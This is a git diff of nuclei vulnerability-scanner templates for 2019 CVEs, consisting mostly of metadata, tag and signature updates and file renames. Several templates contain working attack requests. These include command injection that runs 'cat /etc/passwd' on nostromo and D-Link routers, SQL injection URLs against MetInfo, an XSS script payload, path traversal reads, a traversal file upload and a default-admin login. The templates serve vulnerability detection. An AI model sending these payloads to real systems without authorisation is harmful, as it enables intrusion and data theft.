b/nuclei-templates/CVE-2019/CVE-2019-15642.yaml index c536939b59..092de77f40 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15642.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15642.yaml @@ -6,6 +6,8 @@ info: severity: high description: | rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. remediation: | Upgrade Webmin to version 1.920 or later to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-15642 cwe-id: CWE-94 - epss-score: 0.26994 - epss-percentile: 0.96292 + epss-score: 0.22278 + epss-percentile: 0.9605 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: verified: true @@ -79,4 +81,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfa0d3124a91d441f75609b2eaa4fbc39e7e8e2663ca2510935b99d0e921076802210095ccb298220471e14675492922192eaad694ae301df960dfe525e7279f35413a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203340b3245dd51d9b67c6f29e2eb95aa3da0875247e28110b582812e96814346302200db80c14d3d510ec344719ffefd2e392bb9316a3d49a3d4e3aae41b95b77c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-15829.yaml b/nuclei-templates/CVE-2019/CVE-2019-15829.yaml index 737491a261..fd23065c70 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15829.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15829.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15829 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50433 + epss-percentile: 0.50525 cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: gallery_photoblocks framework: wordpress publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" - tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan + tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs http: - raw: @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "post galleries!")' condition: and -# digest: 4a0a00473045022100bcd420c86f0d3bb857c91e052a02f49bd5de98c99032903a056ff89379c35f1602204b6fc7af4b181c1a5e3ca8fc6ec406e1407a1dc9f53bb819d9f6b58808620105:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205217fa5d440959f2c80a587abe7bebae86cb1964d9c81277de7f8ce83833bfee02202d3d0b408e755ad0ecb80c3a9827a8c06a6c187d00b50e6c01451d50ac04f735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-15858.yaml b/nuclei-templates/CVE-2019/CVE-2019-15858.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15858.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15858.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15859.yaml b/nuclei-templates/CVE-2019/CVE-2019-15859.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15859.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15859.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15889.yaml b/nuclei-templates/CVE-2019/CVE-2019-15889.yaml index 3934366787..66a57ec7c5 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15889.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15889.yaml @@ -1,24 +1,37 @@ id: CVE-2019-15889 + info: name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + - https://www.cybersecurity-help.cz/vdb/SB2019041819 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15889 + cwe-id: CWE-79 + requests: - method: GET path: - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc' + matchers-condition: and matchers: - type: word words: - "" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-16057.yaml b/nuclei-templates/CVE-2019/CVE-2019-16057.yaml index ff13697fe1..9838f0edb4 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16057.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16057.yaml @@ -6,18 +6,22 @@ info: severity: critical description: | The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-16057 - https://web.archive.org/web/20201222035258im_/https://blog.cystack.net/content/images/2019/09/poc.png - https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors + - https://github.com/Z0fhack/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-16057 cwe-id: CWE-78 - epss-score: 0.97548 + epss-score: 0.9754 epss-percentile: 0.99994 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: @@ -39,4 +43,4 @@ http: - status_code == 200 - contains_all(body, "uid=", "gid=", "pwd&id") condition: and -# digest: 4b0a00483046022100ea69902730e5f98ffe759136a914a2c342ef58a6b6d2f50f48629ae4829d1311022100ee181832eb5be95eed8bf936f0378525a8e10c82f941a5eedd34f11ea4418b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d92a0801c2f43788aed32ed75ef458b62aca7e252963f4eb1fcc936afa07554022100df7afc1ba5725bcfdeb382cf89b08067d8bd2758da7a241b7e2de0eb9c038da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-16097.yaml b/nuclei-templates/CVE-2019/CVE-2019-16097.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16097.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16097.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16278.yaml b/nuclei-templates/CVE-2019/CVE-2019-16278.yaml index 8b7971674f..ca568b2722 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16278.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16278.yaml @@ -1,29 +1,29 @@ -id: CVE-2019-16278 - -info: - author: pikpikcu - name: nostromo 1.9.6 - Remote Code Execution - severity: critical - reference: https://www.exploit-db.com/raw/47837 - tags: cve,cve2019,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-16278 - cwe-id: CWE-22 - description: "Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request." - -requests: - - raw: - - | - POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 - Host: {{Hostname}} - - echo - echo - cat /etc/passwd 2>&1 - - matchers: - - type: regex - regex: +id: CVE-2019-16278 + +info: + author: pikpikcu + name: nostromo 1.9.6 - Remote Code Execution + severity: critical + reference: https://www.exploit-db.com/raw/47837 + tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + description: "Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request." + +requests: + - raw: + - | + POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 + Host: {{Hostname}} + + echo + echo + cat /etc/passwd 2>&1 + + matchers: + - type: regex + regex: - "root:.*:0:0:" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-16313.yaml b/nuclei-templates/CVE-2019/CVE-2019-16313.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16313.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16313.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1653.yaml b/nuclei-templates/CVE-2019/CVE-2019-1653.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-1653.yaml rename to nuclei-templates/CVE-2019/CVE-2019-1653.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16662.yaml b/nuclei-templates/CVE-2019/CVE-2019-16662.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16662.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16662.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16759.yaml b/nuclei-templates/CVE-2019/CVE-2019-16759.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16759.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16759.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16920.yaml b/nuclei-templates/CVE-2019/CVE-2019-16920.yaml index f950571c5f..c45dc73829 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16920.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16920.yaml @@ -1,57 +1,53 @@ id: CVE-2019-16920 + info: name: Unauthenticated Multiple D-Link Routers RCE author: dwisiswant0 severity: critical description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. - # References: -# - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 requests: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 + Referer: {{BaseURL}} + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or + part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml b/nuclei-templates/CVE-2019/CVE-2019-16931.yaml index 8249ceebfa..7cccc93c52 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16931.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: wp-plugin,wordpress,wp,xss,unauth + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth requests: - raw: - | diff --git a/nuclei-templates/CVE-2019/CVE-2019-16996.yaml b/nuclei-templates/CVE-2019/CVE-2019-16996.yaml index 83afea932a..8795cf7fef 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16996.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16996.yaml @@ -1,50 +1,32 @@ id: CVE-2019-16996 - info: name: Metinfo 7.0.0 beta - SQL Injection author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2019-16996 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-16996 cwe-id: CWE-89 - epss-score: 0.33595 - epss-percentile: 0.96956 - cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: metinfo - product: metinfo - tags: cve2019,cve,metinfo,sqli - -http: + tags: metinfo,sqli,cve,cve2019 +requests: - method: GET path: - "{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23" - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - "1918835981" - - type: status status: - 200 -# digest: 4b0a00483046022100d7c28728a16c6d6e124df1e88628cfc2b4a62f577db56098997dd65775268ecf022100fb9bfc9e783a86672f070c74024492b2208acb2d01587036674ce8794fb3fc6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/14 diff --git a/nuclei-templates/CVE-2019/cve-2019-17270.yaml b/nuclei-templates/CVE-2019/CVE-2019-17270.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17270.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17270.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17382.yaml b/nuclei-templates/CVE-2019/CVE-2019-17382.yaml deleted file mode 100644 index ac042ce6fc..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17382.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2019-17382 -info: - name: Zabbix Authentication Bypass - author: Harsh Bothra - severity: Critical - # source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382 -requests: - - method: GET - path: - - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Dashboard" diff --git a/nuclei-templates/CVE-2019/CVE-2019-17418.yaml b/nuclei-templates/CVE-2019/CVE-2019-17418.yaml index 86a6c43174..ad40388cd6 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-17418.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-17418.yaml @@ -1,30 +1,51 @@ id: CVE-2019-17418 + info: - name: MetInfo 7.0 - SQL Injection + name: MetInfo 7.0.0 beta - SQL Injection author: ritikchaddha severity: high - description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997 + description: | + MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 - https://github.com/evi1code/Just-for-fun/issues/2 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 + - https://github.com/0ps/pocassistdb + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-17418 cwe-id: CWE-89 - tags: metinfo,sqli,cve,cve2019 -requests: + epss-score: 0.54908 + epss-percentile: 0.97587 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: metinfo + product: metinfo + tags: cve,cve2019,metinfo,sqli + +http: - method: GET path: - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin" - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - "43865094559" + - type: status status: - 200 +# digest: 490a0046304402205bdf0cc9483e4e894c8475e62e7447fa16b29482cdce267e1e74f1a70076ecc1022010eefa66a62af9489630df3329d9f6ac0ebf0b2b697a4e515aaeb9c8e5f98061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml b/nuclei-templates/CVE-2019/CVE-2019-17444.yaml deleted file mode 100644 index 14e1fa3426..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2019-17444 -info: - name: Jfrog Artifactory <6.17.0 - Default Admin Password - author: pdteam - severity: critical - description: | - Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. - reference: - - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes - - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory - - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-17444 - cwe-id: CWE-521 - tags: cve,cve2019,jfrog,default-login -requests: - - raw: - - | - POST /ui/api/v1/ui/auth/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - X-Requested-With: XMLHttpRequest - Origin: {{RootURL}} - - {"user":"admin","password":"password","type":"login"} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"name":"admin"' - - '"admin":true' - condition: and - - type: status - status: - - 200 -# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2019/cve-2019-17506.yaml b/nuclei-templates/CVE-2019/CVE-2019-17506.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17506.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17506.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-17538.yaml b/nuclei-templates/CVE-2019/CVE-2019-17538.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17538.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17538.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17574.yaml b/nuclei-templates/CVE-2019/CVE-2019-17574.yaml index cde4fb25ad..54ec06a2a9 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-17574.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-17574.yaml @@ -1,4 +1,4 @@ -id: 'CVE-2019-17574' +id: CVE-2019-17574 info: name: Popup-Maker < 1.8.12 - Broken Authentication @@ -6,6 +6,8 @@ info: severity: critical description: | An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file"). + impact: | + Unauthenticated attackers can gain administrative access to the WordPress site. remediation: | Update Popup-Maker plugin to version 1.8.12 or later. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.1 cve-id: 'CVE-2019-17574' cwe-id: CWE-639 - epss-score: 0.12099 - epss-percentile: 0.94812 + epss-score: 0.12974 + epss-percentile: 0.95024 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +31,7 @@ info: product: popup_maker framework: wordpress publicwww-query: "/wp-content/plugins/popup-maker/" - tags: wpscan,cve,cve2019,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass + tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: - raw: @@ -56,4 +58,4 @@ http: part: body_2 words: - 'CVE-2019-17574' -# digest: 4a0a004730450221008a465d366930f27fa869121c91bd354aa1a9e0ef932e6d74f4d2049a89c622fd022041e08179506b601e10661cdcaa2428272412dc9d00036a59191d253613581772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201cb7a532725f7804448ffc27f5f766edf3676e258b055224261a99d5047c48880221008ee525f52b9b04dc5b281d401e426a6c3519187ae7fa418713b6b6135c6ddc48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-17662.yaml b/nuclei-templates/CVE-2019/CVE-2019-17662.yaml index 4a2a9f4a33..4c359c861a 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-17662.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-17662.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. + impact: | + An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: @@ -13,13 +15,14 @@ info: - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py + - https://github.com/YIXINSHUWU/Penetration_Testing_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 - epss-score: 0.52352 - epss-percentile: 0.97249 + epss-score: 0.64941 + epss-percentile: 0.97813 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 - tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive + tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft http: - raw: @@ -52,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100903634bd067df7890afa48c40a00f4b8de49e569615280a3d8bf2548ec940e5c02203d28a1c23252d087c0e6bc52474459493cdfa9f0d4006b2eeb25d2bb3d95d410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fb82bfb26b97edcb70f493b3640966574b012e563f89c2cdf77953916740bd2022100c643b657ac203096fd96e6dd9cd4a8942c4db7a202addc62e1a0390d913b83e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1821.yaml b/nuclei-templates/CVE-2019/CVE-2019-1821.yaml deleted file mode 100644 index a7ef6d6f69..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-1821.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2019-1821 -info: - name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution - author: _0xf4n9x_ - severity: critical - description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system. - reference: - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce - - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-1821 - cwe-id: CWE-20 - metadata: - shodan-query: http.title:"prime infrastructure" - tags: cve,cve2019,rce,fileupload,unauth,intrusive,cisco -requests: - - raw: - - | - POST /servlet/UploadServlet HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Primary-IP: 127.0.0.1 - Filename: test.tar - Filesize: 10240 - Compressed-Archive: false - Destination-Dir: tftpRoot - Filecount: 1 - Content-Length: 269 - Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 - - --871a4a346a547cf05cb83f57b9ebcb83 - Content-Disposition: form-data; name="files"; filename="test.tar" - - ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} - --871a4a346a547cf05cb83f57b9ebcb83-- - - | - GET /test.txt HTTP/1.1 - Host: {{Host}} - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "contains((body_2), '{{randstr}}')" - condition: and - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18371.yaml b/nuclei-templates/CVE-2019/CVE-2019-18371.yaml new file mode 100644 index 0000000000..56853b7955 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-18371.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-18371 +info: + name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion + author: ritikchaddha + severity: high + description: | + Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. + reference: + - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html + - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py + - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18371 + cwe-id: CWE-22 + tags: xiaomi,cve2019,cve,lfi,router,mi,router +requests: + - method: GET + path: + - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/cve-2019-18394.yaml b/nuclei-templates/CVE-2019/CVE-2019-18394.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-18394.yaml rename to nuclei-templates/CVE-2019/CVE-2019-18394.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-18665.yaml b/nuclei-templates/CVE-2019/CVE-2019-18665.yaml new file mode 100644 index 0000000000..36b4018e5a --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-18665.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-18665 +info: + name: DOMOS 5.5 - Directory Traversal + author: 0x_Akoko + severity: high + description: | + The Log module in SECUDOS DOMOS before 5.6 allows local file inclusion. + reference: + - https://atomic111.github.io/article/secudos-domos-directory_traversal + - https://vuldb.com/?id.144804 